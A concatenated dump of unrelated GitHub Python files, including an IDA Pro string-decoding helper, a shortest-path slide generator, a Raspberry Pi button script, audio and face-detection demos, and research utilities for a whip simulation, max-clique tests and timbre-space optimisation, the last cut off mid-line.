0x5D, \n 0x7B, 0x7D, 0x3C, 0x3E, 0x3F, 0x60, 0x3A, 0x2C, 0x2E]\n\ndef search_chr(charr):\n \"\"\"\" return arg offset in list.\"\"\"\n try:\n offset = chr_list.index(charr)\n except ValueError:\n print('[-] search_chr() error')\n offset = 0xFF\n return offset\n\ndef decode_four(byte_list, index=0):\n\n \"\"\"decode list four bytes\"\"\"\n '''\n .text:004016D7 mov ecx, [esp+70h+offset_four]\n .text:004016DB mov al, cl\n .text:004016DD add al, al\n .text:004016DF mov dl, ch\n .text:004016E1 shr dl, 4\n .text:004016E4 and dl, 3\n .text:004016E7 add al, al\n .text:004016E9 add dl, al\n .text:004016EB mov al, byte ptr [esp+70h+offset_four+2]\n .text:004016EF mov byte ptr [esp+70h+var_54], dl\n .text:004016F3 mov dl, al\n .text:004016F5 shr dl, 2\n .text:004016F8 mov cl, ch\n .text:004016FA shl al, 6\n .text:004016FD add al, byte ptr [esp+70h+offset_four+3]\n .text:00401701 and dl, 0Fh\n .text:00401704 shl cl, 4\n .text:00401707 xor dl, cl\n .text:00401709 mov byte ptr [esp+70h+var_54+1], dl\n .text:0040170D mov byte ptr [esp+70h+var_54+2], al\n '''\n al = byte_list[0]\n al = (al + al) & 0xFF\n dl = byte_list[1]\n dl = dl >> 4\n dl = dl & 3\n al = (al + al) & 0xFF\n dl = (al + dl) & 0xFF\n first_chr = chr(dl)\n dl = byte_list[2]\n dl = dl >> 2\n dl = dl & 0x0F\n cl = byte_list[1]\n cl = (cl << 4) & 0xFF\n dl = dl ^ cl\n second_chr = chr(dl)\n al = byte_list[2]\n al = (al << 6) & 0xFF\n al = (al + byte_list[3]) & 0xFF\n three_chr = chr(al)\n print('[+] encode chr: %c, %c, %c' % (first_chr, second_chr, three_chr))\n if index:\n return (first_chr, second_chr, three_chr)\n return ''.join([first_chr, second_chr, three_chr])\n\n\ndef decode(data, size):\n \"\"\"decode data like base64\"\"\"\n sub_data = [0, 0, 0, 0]\n offset = [0, 0, 0, 0]\n index = 0\n decode_str = ''\n for x in xrange(size):\n if data[x] == 0x3D: ## '='\n break\n index += 1\n sub_index = x % 4\n sub_data[sub_index] = data[x]\n if index == 4:\n print('[+] sub_data %s' % list_hex(sub_data))\n for i in range(4):\n offset[i] = search_chr(sub_data[i])\n ## call decode this four byte\n print('[+] offset_list %s' % list_hex(offset))\n decode_str += decode_four(offset)\n\n index = 0\n if index:\n # surplus = 4 - index\n print(\"[+] exist '=' %s\" % list_hex(data[-4:]))\n for i in range(4):\n offset[i] = search_chr(data[i-4])\n print('[+] end four chr offset %s' % list_hex(offset))\n end_four = decode_four(offset, index)\n for x in range(index-1):\n decode_str += end_four[x]\n\n return decode_str\n\n# \"\"\"\n# Segmented from the main,other modules can be used.\ndef done(addr):\n print('[+] address: %#x' % addr)\n crypted_data, crypted_size = get_data(addr)\n if crypted_size > 0:\n decode_data = decode(crypted_data, crypted_size)\n idc.MakeRptCmt(addr, str(decode_data))\n return decode_data\n #print('[+] size: %#x' % crypted_size)\n else:\n print('[-] failed')\n return None\n\ndef main():\n print('[+] start')\n currer = idc.ScreenEA()\n done(currer)\n\n#######################################################################\n## hotkey\nhotkey_ctx = idaapi.add_hotkey('z', main)\nif hotkey_ctx is None:\n print('[-] Failed to register hotkey!')\n del hotkey_ctx\nelse:\n print('[+] Hotkey registered!')\n## \"\"\"\n\n\"\"\"\n## test unit\nif __name__ == '__main__':\n test = [0x66, 0x7B, 0x38, 0x41, 0x6E, 0x6D, 0x67, 0x41, 0x66, 0x5D, \n 0x3A, 0x23, 0x72, 0x35, 0x34, 0x29, 0x70, 0x6C, 0x38, 0x26, \n 0x6F, 0x6A, 0x38, 0x45, 0x73, 0x35, 0x5B, 0x77, 0x72, 0x3B,\n 0x3D, 0x3D]\n test2 = [0x69, 0x35, 0x3A, 0x77, 0x6F, 0x33, 0x63, 0x5B, 0x72, 0x43, \n 0x63, 0x2A, 0x72, 0x41, 0x72, 0x3D]\n decode_data = decode(test2, len(test2))\n print('[+] test unit decode_data: %s' % decode_data)\n\"\"\"","repo_name":"kcufId/my_ida_python","sub_path":"68CF2070D8FB4963211CFA4F2DAA72E5/decode_string.py","file_name":"decode_string.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6722001403","text":"import math\n\ndef _format_number(x):\n if x == float('inf'):\n return '$\\infty$'\n else:\n return x\n\nclass Node():\n def __init__(self, label):\n self.label = label\n self.visited = False\n self.visiting = False\n self.updating = False\n self.distance = float('inf')\n self.previous = None\n self.distance_changed = False\n self.path = None\n self.edges = []\n\n def table_line(self):\n visited_style = \"visited\" if self.visited else \"unvisited\"\n if self.updating:\n visited_style = \"updating\"\n elif self.distance_changed:\n visited_style = \"changed\"\n return (\n (r\"|[my label {visited}]| {label} \\& |[my distance {visited}]| {distance}\" + \n r\"\\& |[my previous {visited}]| {previous} \"\n r\"\\& |[my path {visited}]| {path}\").format(\n visited=visited_style,\n label=self.label,\n distance=_format_number(self.distance),\n changed=\"changed\" if self.distance_changed else \"unchanged\",\n previous=\"---\" if self.previous == None else self.previous,\n path=r'$\\rightarrow$'.join(self.path) if self.path != None else '---',\n )\n )\n\n def graph_rules(self):\n if self.updating:\n return (\n r\"graph at {}/.style={{hilite}},edges from {}/.style={{hilite}},\".format(self.label, self.label)\n )\n elif self.visited:\n return (\n r\"graph at {}/.style={{hidden}},\".format(self.label)\n )\n else:\n return \"\"\n\n def graph_rules_init(self):\n return (\n r\"graph at {}/.style={{}},edges from {}/.style={{}},\".format(self.label, self.label)\n )\n\n def graph_line(self, edge_type='->'):\n output = \"\"\n for out_vertex, out_weight in self.edges:\n if edge_type == '--' and out_vertex < self.label:\n continue\n output += '{label}[graph at {label}] {edge_type}[edges from {label},edges from {out_label},\"{out_weight}\"] {out_vertex}[graph at {out_vertex}],\\n'.format(\n label=self.label,\n out_label=out_vertex if edge_type == '--' else self.label,\n out_vertex=out_vertex,\n out_weight=out_weight,\n edge_type=edge_type,\n )\n return output\n\n\nclass Graph():\n nodes = {}\n\n def add_node(self, k, v):\n self.nodes[k] = Node(k)\n self.nodes[k].edges = v\n\n def reflect_edges(self):\n for k in self.nodes.keys():\n for e in self.nodes[k].edges:\n target = e[0]\n new_edge = (k, e[1])\n if new_edge not in self.nodes[target].edges:\n self.nodes[target].edges.append(new_edge)\n\n\n def generate_table(self):\n output = []\n for key in sorted(self.nodes.keys()):\n output.append(self.nodes[key].table_line())\n return (r'\\\\' + '\\n').join(output) + r'\\\\'\n\n def generate_graph_rules(self):\n output = []\n for key in sorted(self.nodes.keys()):\n output.append(self.nodes[key].graph_rules())\n return ''.join(output)\n\n def best_first_search(self, start, edge_type='->'):\n tables = []\n rules = []\n self.nodes[start].distance = 0\n self.nodes[start].path = [start]\n def _find_next():\n best_distance = float('inf')\n best_node = None\n for node_key in sorted(self.nodes.keys()):\n node = self.nodes[node_key]\n if node.visited:\n continue\n if node.distance < best_distance:\n best_node = node\n best_distance = node.distance\n return best_node\n tables.append(self.generate_table())\n rules.append(self.generate_graph_rules())\n while True:\n current = _find_next()\n if current == None:\n break\n current.updating = True\n for out_key, weight in current.edges:\n out = self.nodes[out_key]\n new_distance = current.distance + weight\n if new_distance < out.distance:\n out.distance = new_distance\n out.previous = current.label\n out.path = current.path + [out.label]\n out.distance_changed = True\n tables.append(self.generate_table())\n rules.append(self.generate_graph_rules())\n for node in self.nodes.values():\n node.distance_changed = False\n current.updating = False\n current.visited = True\n graph_rules_init = list(map(lambda k: self.nodes[k].graph_rules_init(), sorted(self.nodes.keys())))\n output = r'''\n\\tikzset{%s}\n''' % ('\\n'.join(graph_rules_init))\n for i, rule in enumerate(rules):\n output += (r'''\n\\tikzset{\n alt=<%s>{%s}{},\n}\n''' % (i + 1 , rule))\n graph_lines = list(map(lambda k: self.nodes[k].graph_line(edge_type), sorted(self.nodes.keys())))\n output += r'''\n\\matrix[my graph box] (the graph) {\n\\begin{scope}[my graph]\n\\graph[spring layout]{\n %s\n};\n\\end{scope}\n\\\\\n};\n''' % ('\\n'.join(graph_lines))\n for i, table in enumerate(tables):\n output += (r'''\n\\begin{onlyenv}<%s>\n\\matrix[\n my algorithm table,\n ] (the table) {\n~ \\& dist \\& prev \\& path \\\\\n%s\n};\n\\end{onlyenv}\n ''' % (i + 1, table))\n return output\n\ndef example_one():\n g = Graph()\n g.add_node('A', [('C', 2), ('D', 1)])\n g.add_node('B', [('A', 2)])\n g.add_node('C', [('D', 1), ('F', 2)])\n g.add_node('D', [('B', 5), ('E', 1), ('F', 6), ('G', 5)])\n g.add_node('E', [('B', 1)])\n g.add_node('F', [('G', 10)])\n g.add_node('G', [('E', 3)])\n print(g.best_first_search('A'))\n\ndef example_two():\n g = Graph()\n g.add_node('A', [('B', 7), ('C', 9), ('G', 14)])\n g.add_node('B', [('C', 10), ('D', 15)])\n g.add_node('C', [('D', 11), ('G', 2)])\n g.add_node('D', [('E', 6)])\n g.add_node('E', [('G', 9)])\n g.add_node('G', [])\n g.reflect_edges()\n print(g.best_first_search('A', '--'))\n\nif __name__ == '__main__':\n example_one()\n","repo_name":"charlesreiss/cs2150-slides","sub_path":"graphs/make_bfs_example.py","file_name":"make_bfs_example.py","file_ext":"py","file_size_in_byte":6299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34902331154","text":"import RPi.GPIO as GPIO # Importe communication sur les pins GPIO\nimport time # Permet d'éteindre la led au bout de x temps\nimport printing # Importe le fichier print.py qui est normalement dans le même dossier\nimport led\n\n# On dit au raspberry qu'on utilise le numéros des pins telles que GPIOXX pour communiquer\n# schéma : https://cdn-learn.adafruit.com/assets/assets/000/031/833/original/raspberry_pi_gpio-diagram.png?1461025067\nGPIO.setmode(GPIO.BCM) \n# (possibilité de communiquer via le numéro des pins directement avec)\n#GPIO.setmode(GPIO.BOARD)\n\n# Initialisation IN, de la pin GPIO23 (bouton) et GPIO24 (LED).\nGPIO.setup(23, GPIO.IN, pull_up_down=GPIO.PUD_UP) # GPIO.IN -> on écoute sur la pin (INPUT) | pull_up_down=GPIO.PUD_UP -> le raspberry gère ici le pull up pour éviter de lire un input avec des interférences entre 0 et 1\nGPIO.setup(16, GPIO.OUT) # GPIO.OUT -> on envoie sur la pin (OUTPUT), ce qui allumera la LED\n\n\ntry: # Essaie d'exécuter ce code...\n\n\twhile True:\n\t\tbutton_state = GPIO.input(23) # On lit le statut de la pin 23 et le met dans une variable (soit 1 soit 0)\n\t\tif button_state == False: \n\t\t\tprint(\"on a appuyé sur le bouton\")\n\t\t\tled.pushedButtonDetected()\n\t\t\tprinting.printFile() # Lance la fonction dans le fichier print.py qui lance l'impression\n\n\t\telse:\n\t\t\tGPIO.output(16, False) # Garde la LED éteinte\n\t\t\t\t\nexcept: # ... et si tu rencontres une erreur \n\tGPIO.cleanup() # Nettoie les ports utilisés \n\t\n","repo_name":"estherbouquet/lectura-plus","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"fr","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"73169567138","text":"import math\nimport time\n\nfrom scipy import signal\nfrom scipy.io import wavfile\nimport cv2\n\nt1 = time.time()\n\naddr = input('Input file\\'s address:')\n\nsample_rate, samples = wavfile.read(addr)\nfrequencies, times, spectrogram = signal.spectrogram(samples, sample_rate)\n\nhFrequencies = []\nmaxAmp = 0\nminAmp = 1000000\nmaxFreq = 0\nminFreq = 1000000\nfor i in range(0, times.size):\n maxAmpT = 0\n mft = 0\n for j in range(0, frequencies.size):\n mft += spectrogram[j, i] * frequencies[j]\n if spectrogram[j, i] > maxAmpT:\n maxAmpT = spectrogram[j, i]\n maxAmp = max(maxAmpT, maxAmp)\n minAmp = min(maxAmpT, minAmp)\n maxFreq = max(mft, maxFreq)\n minFreq = min(mft, minFreq)\n hFrequencies.append((mft, maxAmpT))\n\nimgLU = cv2.imread(\"../blank.jpg\", cv2.IMREAD_COLOR)\nimgRU = cv2.imread(\"../blank.jpg\", cv2.IMREAD_COLOR)\nimgLD = cv2.imread(\"../blank.jpg\", cv2.IMREAD_COLOR)\nimgRD = cv2.imread(\"../blank.jpg\", cv2.IMREAD_COLOR)\nheight, width, channels = imgLU.shape\n\nfor (t, (f, a)) in enumerate(hFrequencies):\n hsv = (\n 180 - math.floor((((f - minFreq) / (maxFreq - minFreq)) * 180)), (math.floor(((a - minAmp) / (maxAmp - minAmp)) * 100.0) + 155), 255)\n cv2.circle(imgLU, (0, 0), math.floor(t), hsv, 2)\n\nfor (t, (f, a)) in enumerate(hFrequencies):\n hsv = (\n 180 - math.floor((((f - minFreq) / (maxFreq - minFreq)) * 180)), (math.floor(((a - minAmp) / (maxAmp - minAmp)) * 100.0) + 155), 255)\n cv2.circle(imgRU, (-width, 0), math.floor(t), hsv, 2)\n\nfor (t, (f, a)) in enumerate(hFrequencies):\n hsv = (\n 180 - math.floor((((f - minFreq) / (maxFreq - minFreq)) * 180)), (math.floor(((a - minAmp) / (maxAmp - minAmp)) * 100.0) + 155), 255)\n cv2.circle(imgLD, (0, -height), math.floor(t), hsv, 2)\n\nfor (t, (f, a)) in enumerate(hFrequencies):\n hsv = (\n 180 - math.floor((((f - minFreq) / (maxFreq - minFreq)) * 180)), (math.floor(((a - minAmp) / (maxAmp - minAmp)) * 100.0) + 155), 255)\n cv2.circle(imgRD, (-width, -height), math.floor(t), hsv, 2)\n\nimgLU = cv2.cvtColor(imgLU, cv2.COLOR_HSV2RGB)\nimgLD = cv2.cvtColor(imgLD, cv2.COLOR_HSV2RGB)\nimgRU = cv2.cvtColor(imgRU, cv2.COLOR_HSV2RGB)\nimgRD = cv2.cvtColor(imgRD, cv2.COLOR_HSV2RGB)\n\ncv2.namedWindow('LU', cv2.WINDOW_NORMAL)\ncv2.imshow('LU', imgLU)\n\ncv2.namedWindow('LD', cv2.WINDOW_NORMAL)\ncv2.imshow('LD', imgLD)\n\ncv2.namedWindow('RU', cv2.WINDOW_NORMAL)\ncv2.imshow('RU', imgRU)\n\ncv2.namedWindow('RD', cv2.WINDOW_NORMAL)\ncv2.imshow('RD', imgRD)\n\nprint(time.time() - t1)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"hpez/tunegraphy","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"39338541960","text":"import cv2\nimport mediapipe as mp\nimport time\n\ncap = cv2.VideoCapture(0)\ncv2.namedWindow('get_video', cv2.WINDOW_NORMAL)\ncv2.resizeWindow('get_video', 640, 480)\npTime = 0\n\nmpFaceDetection = mp.solutions.face_detection\nmpDraw = mp.solutions.drawing_utils\nfaceDetection = mpFaceDetection.FaceDetection()\n\nwhile True:\n success, frame = cap.read()\n frameRGB = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n results = faceDetection.process(frameRGB)\n if results.detections:\n for id, detection in enumerate(results.detections):\n # mpDraw.draw_detection(frame, detection)\n bboxC = detection.location_data.relative_bounding_box\n h, w, c = frame.shape\n bbox = [int(bboxC.xmin * w), int(bboxC.ymin * h), int(bboxC.width * w), int(bboxC.height * h)]\n cv2.rectangle(frame, bbox, (255, 0, 255), 2)\n cv2.putText(frame, str(round(detection.score[0], 2)), (bbox[0], bbox[1] - 10), cv2.FONT_HERSHEY_PLAIN,\n 1, (255, 0, 255), 2)\n # print(id, detection)\n # print(detection.score)\n # print(detection.location_data.relative_bounding_box)\n\n cTime = time.time()\n fps = 1 / (cTime - pTime)\n pTime = cTime\n\n cv2.putText(frame, str(int(fps)), (20, 70), cv2.FONT_HERSHEY_PLAIN, 3, (0, 255, 0), 2)\n cv2.imshow('get_video', frame)\n if cv2.waitKey(30) == ord('q'):\n break\n\ncv2.destroyAllWindows()\n","repo_name":"Mingrui-Huang/OpenCV","sub_path":"学习/opencv项目/人脸检测/作业5@1_人脸识别.py","file_name":"作业5@1_人脸识别.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6582258632","text":"import argparse\nimport numpy as np\n\ndef my_parser( ):\n # Argument Parsers\n parser = argparse.ArgumentParser( description = 'Parsing the arguments for running the simulation' )\n parser.add_argument( '--version' , action = 'version' , version = Constants.VERSION )\n\n parser.add_argument( '--start_time' , action = 'store' , type = float , default = 0.0, help = 'Start time of the controller' )\n parser.add_argument( '--run_time' , action = 'store' , type = float , default = 4.0, help = 'Total run time of the simulation' )\n parser.add_argument( '--model_name' , action = 'store' , type = str , default = '2D_model' , help = 'Model name for the simulation' )\n parser.add_argument( '--ctrl_name' , action = 'store' , type = str , default = 'joint_imp_ctrl', help = 'Model name for the simulation' )\n parser.add_argument( '--cam_pos' , action = 'store' , type = str , help = 'Get the whole list of the camera position' )\n parser.add_argument( '--mov_pars' , action = 'store' , type = str , help = 'Get the whole list of the movement parameters' )\n parser.add_argument( '--target_type' , action = 'store' , type = int , help = 'Save data log of the simulation, with the specified frequency' )\n parser.add_argument( '--print_mode' , action = 'store' , type = str , default = 'normal', help = 'Print mode, choose between [short] [normal] [verbose]' )\n\n parser.add_argument( '--target_idx' , action = 'store' , type = int , default = 1, help = 'Index of Target 1~6' )\n\n parser.add_argument( '--print_freq' , action = 'store' , type = int , default = 60 , help = 'Specifying the frequency of printing the data.' )\n parser.add_argument( '--save_freq' , action = 'store' , type = int , default = 60 , help = 'Specifying the frequency of saving the data.' )\n parser.add_argument( '--vid_speed' , action = 'store' , type = float , default = 1. , help = 'The speed of the video. It is the gain of the original speed of the video ' )\n\n parser.add_argument( '--record_vid' , action = 'store_true' , dest = \"is_record_vid\" , help = 'Record video of the simulation, with the specified speed' )\n parser.add_argument( '--save_data' , action = 'store_true' , dest = \"is_save_data\" , help = 'Save the details of the simulation' )\n parser.add_argument( '--vid_off' , action = 'store_true' , dest = \"is_vid_off\" , help = 'Turn off the video' )\n parser.add_argument( '--run_opt' , action = 'store_true' , dest = \"is_run_opt\" , help = 'Run optimization of the simulation' )\n\n parser.add_argument( '--opt_type' , action = 'store' , type = int, dest = \"opt_type\" , help = 'Type of Optimization' )\n\n return parser\n\n\nclass Constants:\n PROJECT_NAME = '[M3X] Whip Project'\n VERSION = '2.0.0'\n UPDATE_DATE = '2022.06.21'\n AUTHOR_GITHUB = 'mosesnah-shared'\n AUTHOR_FULL_NAME = 'Moses C. Nah'\n DESCRIPTION = \"mujoco-py scripts for running a whip-targeting simuation\"\n URL = 'https://github.com/mosesnah-shared/whip-project-targeting',\n AUTHOR_EMAIL = 'mosesnah@mit.edu', 'mosesnah@naver.com'\n\n # =============================================================== #\n # Constant variables for running the simulation\n # =============================================================== #\n \n # The module directory which contains all python modules.\n MODULE_DIR = \"./modules/\"\n\n # The model directory which contains all the xml model files.\n MODEL_DIR = \"./models/\"\n\n # The directory which saves all the simulation results\n SAVE_DIR = \"./results/\"\n\n # The directory which saves all the temporary data\n TMP_DIR = \"./tmp/\"\n\n # The constant K matrices that we will use often. \n # For a 2DOF model\n # [REF] Nah, Moses C., et al. \"Dynamic primitives facilitate manipulating a whip.\", BIOROB 2020\n K_2DOF = np.array( [ [ 29.50, 14.30 ], [ 14.30, 39.30 ] ] )\n \n # For a 4DOF model.\n # [REF] Manipulating a whip in 3D\n K_4DOF = np.array( [ [ 17.40, 6.85, -7.75, 8.40 ] ,\n [ 6.85, 33.0, 3.70, 0.00 ] ,\n [ -7.75, 3.70, 27.7, 0.00 ] ,\n [ 8.40, 0.00, 0.00, 23.2 ] ] )\n\n K_dict = { 2: K_2DOF, 4: K_4DOF }\n # K_4DOF = 300 * np.eye( 4 )\n\n # The above value is the symmetric part of the following matrix\n # K_4DOF = np.array( [ [ 17.40, 4.70, -1.90, 8.40 ] ,\n # [ 9.00, 33.0, 4.40, 0.00 ] ,\n # [ -13.6, 3.00, 27.7, 0.00 ] ,\n # [ 8.40, 0.00, 0.00, 23.2 ] ] )\n","repo_name":"mosesnah-shared/whip-project-targeting","sub_path":"modules/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":5755,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"5024420453","text":"#!/usr/bin/env python\n\"\"\"\n** CSC 532 Final Research Project **\nComparing Sequential and Parallel Algorithm Performance for Solving the Maximum Clique Problem\nBy: Aaron Csetter, Dmytro Dobryin, Ian Pena, and Nathan Davis\nUNCW: Spring 2023\n\"\"\"\nimport time\nimport networkx as nx\nimport csv\nfrom os.path import exists\n\n\ndef timing(f):\n \"\"\"\n Wraps a function in a timer and returns the function's return value and the time it\n took to execute the function in seconds. Source: https://github.com/donfaq/max_clique\n :param f: a function annotated with `@timing`\n :return: (func, float) return value of f, execution time of f\n \"\"\"\n def wrap(*args):\n t1 = time.perf_counter()\n fn = f(*args)\n t2 = time.perf_counter()\n return fn, t2 - t1\n return wrap\n\n\ndef read_dimacs_graph(file_path: str, name=\"\", verbose=False) -> nx.Graph:\n \"\"\"\n Parse .col file and return graph object\n :param name: (Str) the name of the graph.\n :param verbose: (bool) whether to print .col file info or not.\n :param file_path: (Str) path to the .col\n :return: (nx.graph) the graph built from expected file path.\n \"\"\"\n if name == \"\":\n start = max(file_path.rfind('/'), file_path.rfind('\\\\')) + 1\n name = file_path[start:file_path.rfind('.')]\n edges = []\n ext = file_path.endswith('mtx')\n with open(file_path, 'r') as file:\n if file_path.endswith('mtx'):\n lines = file.readlines()[2:]\n for line in lines:\n v1, v2 = line.split()\n edges.append((v1, v2))\n elif file_path.endswith('col'):\n for line in file:\n if verbose and line.startswith(('c', 'p')):\n print(line[2:].strip())\n\n if line.startswith('e'):\n _, v1, v2 = line.split()\n edges.append((v1, v2))\n else:\n raise ValueError(\"Filetype not supported.\")\n\n return nx.Graph(edges, name=name)\n\n\ndef graph_max_degree(g: nx.Graph):\n return sorted(nx.degree(g), key=lambda x: x[1])[-1][1]\n\n\ndef fetch_graph_info(g: nx.Graph, printable=False) -> dict:\n nodes = sorted(nx.degree(g), key=lambda x: x[1])\n w_space = ' ' if printable else ''\n return {\n \"Graph Name\": g.name,\n \"# Vertices\": g.number_of_nodes(),\n f\"# Edges{w_space}\": g.number_of_edges(),\n f\"Density{w_space}\": nx.density(g),\n \"Avg Degree\": sum([x[1] for x in nodes]) / len(nodes),\n \"Max Degree\": nodes[-1][1],\n \"Min Degree\": nodes[0][1],\n \"# Isolated\": [x[1] for x in nodes].count(0)\n }\n\n\ndef print_graph_info(g: nx.Graph):\n # nodes = sorted(nx.degree(g), key=lambda x: x[1])\n g_info = fetch_graph_info(g, printable=True)\n p_str = \"\"\n\n for key in g_info.keys():\n p_str += f\"{key}\\t{g_info[key]}\\n\"\n\n print(p_str)\n\n\ndef print_test_results(results: dict):\n s = \"\"\n for key in results.keys():\n s += f\"{key}\\t{results[key]}\\n\"\n\n print(s)\n\n\ndef log_results(results: dict, file_path=\"results.csv\"):\n mode = \"a+\"\n if not exists(f\"./{file_path}\"):\n mode = \"w+\"\n with open(file_path, mode, newline='') as f:\n writer = csv.writer(f)\n if mode == \"w+\":\n writer.writerow(results.keys())\n writer.writerow(results.values())\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"acsetter/mcp-project","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9470726789","text":"import numpy as np\nimport matplotlib.pylab as plt\nimport os\nimport pickle\nimport pca\n# from optimization import kernel_optim\nfrom lib import load\nfrom lib import training\nimport time\nimport subprocess\n\ntimbrespace_db = load.database()\nrepresentations = [\n # 'auditory_spectrum',\n # 'fourier_spectrum',\n # 'auditory_strf',\n # 'fourier_strf',\n # 'auditory_spectrogram', \n 'fourier_spectrogram',\n # 'auditory_mps', \n # 'fourier_mps',\n]\n\n\ndef run_once(tsp, rs, optim_args):\n rslog_foldername = optim_args['log_foldername']\n rs = rslog_foldername.split('/')[-1].split('-')[0]\n dissimil_mat = load.timbrespace_dismatrix(tsp, timbrespace_db)\n aud_repres = load.timbrespace_features(\n tsp,\n representations=[rs],\n window=None,\n timbrespace_db=None,\n verbose=True)[rs]\n tab_red = []\n rs_type = rs.split('_')[-1]\n mapping = []\n variances = []\n if rs_type == 'strf':\n n_components = 1\n for i in range(len(aud_repres)):\n strf_reduced, mapping, variances = pca.pca(\n np.absolute(aud_repres[i]),\n aud_repres[i].shape[1],\n n_components=n_components)\n strf_reduced = strf_reduced.flatten()\n tab_red.append(strf_reduced)\n # tab_red.append(strf_reduced / np.max(strf_reduced))\n tab_red = np.transpose(np.asarray(tab_red))\n elif rs_type == 'spectrogram' or rs_type == 'mps':\n for i in range(len(aud_repres)):\n tab_red.append(aud_repres[i].flatten())\n tab_red = np.transpose(np.asarray(tab_red))\n elif rs_type == 'spectrum':\n for i in range(len(aud_repres)):\n tab_red.append(aud_repres[i])\n # 128 x nb sounds (time or freq?)\n tab_red = np.transpose(np.asarray(tab_red))\n pickle.dump({\n 'data_repres': aud_repres,\n 'data_proj': tab_red,\n 'mapping': mapping,\n 'variances': variances,\n 'dissimilarities': dissimil_mat,\n }, open(os.path.join(rslog_foldername, 'dataset.pkl'), 'wb'))\n print(' data dimension:', tab_red.shape)\n print('* normalizing')\n tab_red = tab_red / np.max(np.max(np.abs(tab_red), axis=0))\n # plt.plot(tab_red)\n # plt.show()\n # optimization\n correlations = training.kernel_optim(tab_red, dissimil_mat, **optim_args)\n\n\ndef run_optimization(optim_args={}):\n for i, tsp in enumerate(sorted(timbrespace_db.keys())):\n print('Processing', tsp)\n log_foldername = 'outs_all/' + tsp.lower()\n subprocess.call(['mkdir', '-p', log_foldername])\n for rs in representations:\n rslog_foldername = log_foldername + '/' + rs + '-' + time.strftime(\n '%y%m%d@%H%M%S')\n subprocess.call(['mkdir', '-p', rslog_foldername])\n optim_args['log_foldername'] = rslog_foldername\n run_once(tsp, rs, optim_args)\n\n\ndef run_all():\n optim_args = {\n 'cost': 'correlation',\n 'loss': 'exp_sum',\n 'init_sig_mean': 1.0,\n 'init_sig_var': 0.01,\n 'num_loops': 50000,\n 'learning_rate': 0.5,\n 'log_foldername': './',\n 'logging': True\n }\n run_optimization(optim_args)\n\n\ndef grid_search_lr():\n for learning_rate in [1.0, 0.1, 0.01, 0.001]:\n for n_test in range(5):\n print('***', learning_rate, n_test + 1)\n optim_args = {\n 'cost': 'correlation',\n 'loss': 'loglikelihood',\n 'init_sig_mean': 1.0,\n 'init_sig_var': 1.0,\n 'num_loops': 40000,\n 'learning_rate': learning_rate,\n 'log_foldername': './',\n 'logging': True\n }\n run_optimization(optim_args)\n\n\ndef resume_all(resumefn='./outs/'):\n for i, tsp in enumerate(sorted(timbrespace_db.keys())):\n print('Processing', tsp)\n dissimil_mat = load.timbrespace_dismatrix(tsp, timbrespace_db)\n for rs in representations:\n # for el in dir_names:\n # if el[1].split('-')[0] == tsp.lower() and el[1].split(\n # '-')[1] == rs:\n rslog_foldername = './outs/' + tsp.lower() + '/' + rs\n if os.path.isdir(rslog_foldername):\n # retrieve_foldername = os.path.join(el[0], el[1])\n training.resume_kernel_optim(\n rslog_foldername,\n rslog_foldername,\n num_loops=100000,\n logging=True)\n else:\n subprocess.call(['mkdir', '-p', rslog_foldername])\n run_once(tsp, rs, rslog_foldername)\n\n\ndef resume_some(tsps=None, reps=None):\n tspaces = tsp if tsps != None else timbrespace_db.keys()\n some_reps = reps if reps != None else representations\n for i, tsp in enumerate(sorted(tspaces)):\n print('Processing', tsp)\n dissimil_mat = load.timbrespace_dismatrix(tsp, timbrespace_db)\n for rs in some_reps:\n rslog_foldername = './outs_all/' + tsp.lower() + '/' + rs\n if os.path.isdir(rslog_foldername):\n resume = {}\n for root, dirs, files in os.walk(rslog_foldername):\n loop_id = []\n for name in files:\n if name.split('.')[-1] == 'pkl' and 'optim_process' in name.split('.')[0]:\n loop_id.append(int(name.split('.')[0].split('=')[-1]))\n \n optim_process = pickle.load(open(os.path.join(retrieve_foldername,'optim_process_l={}.pkl'.format(retrieved_loop)), 'rb'))\n optim_config = pickle.load(open(os.path.join(retrieve_foldername,'optim_config.pkl'), 'rb'))\n dataset = pickle.load(open(os.path.join(retrieve_foldername,'dataset.pkl'), 'rb'))\n\n input_data = dataset['data_proj']\n target_data = dataset['dissimilarities']\n\n resume['retrieved_loop'] = np.max(loop_id)\n resume['init_seed'] = optim_config['seed']\n\n if verbose:\n print(\"* resuming with '{}' of size {}\".format(retrieve_foldername.split('/')[-1], input_data.shape))\n\n init_seed = optim_config['seed']\n cost = optim_config['args']['cost']\n init_sig_mean = optim_config['args']['init_sig_mean']\n init_sig_var = optim_config['args']['init_sig_var']\n training.resume_kernel_optim(\n rslog_foldername,\n rslog_foldername,\n num_loops=100000,\n logging=True)\n\n\ndef nonopt_correlations():\n corr_results = {}\n for i, tsp in enumerate(timbrespace_db.keys()):\n print('Processing', tsp)\n corr_results[tsp] = {}\n target_data = load.timbrespace_dismatrix(tsp, timbrespace_db)\n for rs in sorted(representations):\n aud_repres = load.timbrespace_features(\n tsp,\n representations=[rs],\n window=None,\n timbrespace_db=None,\n verbose=False)[rs]\n tab_red = []\n rs_type = rs.split('_')[-1]\n if rs_type == 'strf':\n n_components = 1\n for i in range(len(aud_repres)):\n # print('PCA on sound %02i' % (i + 1))\n strf_reduced = pca.pca(\n np.absolute(aud_repres[i]),\n aud_repres[i].shape[1],\n 